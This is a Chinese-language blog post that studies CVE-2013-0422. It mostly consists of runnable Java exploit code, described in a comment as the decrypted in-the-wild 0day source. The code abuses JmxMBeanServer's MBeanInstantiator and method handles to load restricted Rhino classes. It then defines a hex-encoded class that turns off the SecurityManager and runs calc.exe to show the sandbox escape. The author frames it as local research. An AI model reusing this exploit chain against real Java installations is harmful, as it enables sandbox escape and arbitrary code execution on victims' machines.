CVE-2013-0422 学习

wcf1987

浏览: 623789 次
性别:
来自: 西安

最近访客更多访客>>

guojch

XiaoPY

cloaking

gaoaohan

博主相关

博客

微博

相册

留言

关于我

文章分类

社区版块

存档分类

博客分类：

hacker
java

0x01 这个是这两天爆出来的，我构建了一个本地测试代码，主要用来研究，测试方法，直接跑就可以看输出就可以看懂了，具体分析代码见后文

0x02 package test;

/*
Java 0day 1.7.0_10 decrypted source
Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
 */

import java.io.IOException;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.security.Permission;
import java.security.PermissionCollection;
import java.security.Policy;
import java.security.ProtectionDomain;
import java.util.Enumeration;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

public class Test {
	void checkPermission() {
		ProtectionDomain domain = this.getClass().getProtectionDomain();
		PermissionCollection pcoll = Policy.getPolicy().getPermissions(domain);
		Enumeration e = pcoll.elements();
		int i = 0;
		for (; e.hasMoreElements();) {
			Permission p = (Permission) e.nextElement();
			System.out.println(i + ": " + p);
			i++;
		}
		System.out.println("the num:" + i);
	}

	void alert() throws IOException {
		try {
			Runtime.getRuntime().exec("calc.exe");
		} catch (IOException e) {
			// TODO Auto-generated catch block
			e.printStackTrace();
			throw e;
		}
	}

	public static void main(String args[]) {
		try {
			System.out.println("1.SecurityManager 开启前测试");
			Test test = new Test();
			// test.checkPermission();
			try {
				test.alert();
				System.out.println("2.成功执行 exec");
			} catch (SecurityException e) {
				System.out.println("2.you have no permission to exec");
			}

			System.out.println("3.开启SecurityManager");
			System.setSecurityManager(new SecurityManager());
			System.out.println("4.SecurityManager 开启后测试");
			try {
				test.alert();
				System.out.println("5.成功执行 exec");
			} catch (SecurityException e) {
				System.out.println("5.you have no permission to exec");
			}

			byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);

			JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();

			JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer) localJmxMBeanServerBuilder
					.newMBeanServer("", null, null);

			MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer
					.getMBeanInstantiator();

			ClassLoader a = null;

			Class localClass1 = localMBeanInstantiator.findClass(
					"sun.org.mozilla.javascript.internal.Context", a);

			Class localClass2 = localMBeanInstantiator.findClass(
					"sun.org.mozilla.javascript.internal.GeneratedClassLoader",
					a);

			MethodHandles.Lookup localLookup = MethodHandles.publicLookup();

			MethodType localMethodType1 = MethodType.methodType(
					MethodHandle.class, Class.class,
					new Class[] { MethodType.class });

			MethodHandle localMethodHandle1 = localLookup.findVirtual(
					MethodHandles.Lookup.class, "findConstructor",
					localMethodType1);

			MethodType localMethodType2 = MethodType.methodType(Void.TYPE);

			MethodHandle localMethodHandle2 = (MethodHandle) localMethodHandle1
					.invokeWithArguments(new Object[] { localLookup,
							localClass1, localMethodType2 });

			Object localObject1 = localMethodHandle2
					.invokeWithArguments(new Object[0]);

			MethodType localMethodType3 = MethodType.methodType(
					MethodHandle.class, Class.class, new Class[] {
							String.class, MethodType.class });

			MethodHandle localMethodHandle3 = localLookup
					.findVirtual(MethodHandles.Lookup.class, "findVirtual",
							localMethodType3);

			MethodType localMethodType4 = MethodType.methodType(localClass2,
					ClassLoader.class);

			MethodHandle localMethodHandle4;

			localMethodHandle4 = (MethodHandle) localMethodHandle3
					.invokeWithArguments(new Object[] { localLookup,
							localClass1, "createClassLoader", localMethodType4 });

			Object localObject2 = localMethodHandle4
					.invokeWithArguments(new Object[] { localObject1, null });

			MethodType localMethodType5 = MethodType.methodType(Class.class,
					String.class, new Class[] { byte[].class });

			MethodHandle localMethodHandle5 = (MethodHandle) localMethodHandle3
					.invokeWithArguments(new Object[] { localLookup,
							localClass2, "defineClass", localMethodType5 });

			Class localClass3 = (Class) localMethodHandle5
					.invokeWithArguments(new Object[] { localObject2, null,
							arrayOfByte });

			localClass3.newInstance();

			System.out.println("6.CVE-2013-0422执行后");
			try {
				test.alert();
				System.out.println("7.成功执行 exec");
			} catch (SecurityException e) {
				System.out.println("7.you have no permission to exec");
			}

		} catch (Throwable e1) {
			// TODO Auto-generated catch block
			e1.printStackTrace();
		}

	}

	public static byte[] hex2Byte(String paramString)

	{

		byte[] arrayOfByte = new byte[paramString.length() / 2];

		for (int i = 0; i < arrayOfByte.length; i++)

		{

			arrayOfByte[i] = (byte) Integer.parseInt(
					paramString.substring(2 * i, 2 * i + 2), 16);

		}

		return arrayOfByte;

	}

	public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001"
			+ "00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501"
			+ "00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578"
			+ "63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F"
			+ "07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263"
			+ "6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F"
			+ "457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142"
			+ "0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469"
			+ "6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F"
			+ "50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445"
			+ "7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176"
			+ "612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A"
			+ "6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000"
			+ "020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100"
			+ "040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600"
			+ "02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107"
			+ "0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000"
			+ "02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600"
			+ "0000020017";

}

分享到：

CVE-2013-0422 分析2 | CVE 2012 0507 分析

2013-01-11 16:26
浏览 4055
评论(0)
分类:编程语言
查看更多

发表评论

您还没有登录,请您登录后再发表评论

最近访客更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论

CVE-2013-0422 学习

评论

发表评论

相关推荐

最近访客 更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论

CVE-2013-0422 学习

评论

发表评论

相关推荐

metasploit 图形化界面和自动化exploit脚本

APKTool签名的一个问题

APKTool打包的一个小问题

struts2远程执行漏洞学习（四）

纯转一篇关于方法句柄的，对理解很多java poc帮助很大

CVE-2013-1493 学习

myeclipse崩溃多处理的一个小窍门

CVE-2013-0422 分析2

CVE 2012 0507 分析

android 无权限 伪造短信

A new way to hack android app info

一次被黑追凶(未完待续)

<找工作 十一>生产者消费者 组赛队列

<找工作 十>生产者 消费者模型

<找工作 九> 字符串全排列问题

<找工作 七>leetcode Add Two Numbers

<找工作 六>leetcode Median of Two Sorted Arrays

python 反编译 pyc 一些心得

关于web渗透中得一些记录

mail xss

最近访客更多访客>>

android 无权限伪造短信

<找工作十一>生产者消费者组赛队列

<找工作十>生产者消费者模型

<找工作九> 字符串全排列问题

<找工作七>leetcode Add Two Numbers

<找工作六>leetcode Median of Two Sorted Arrays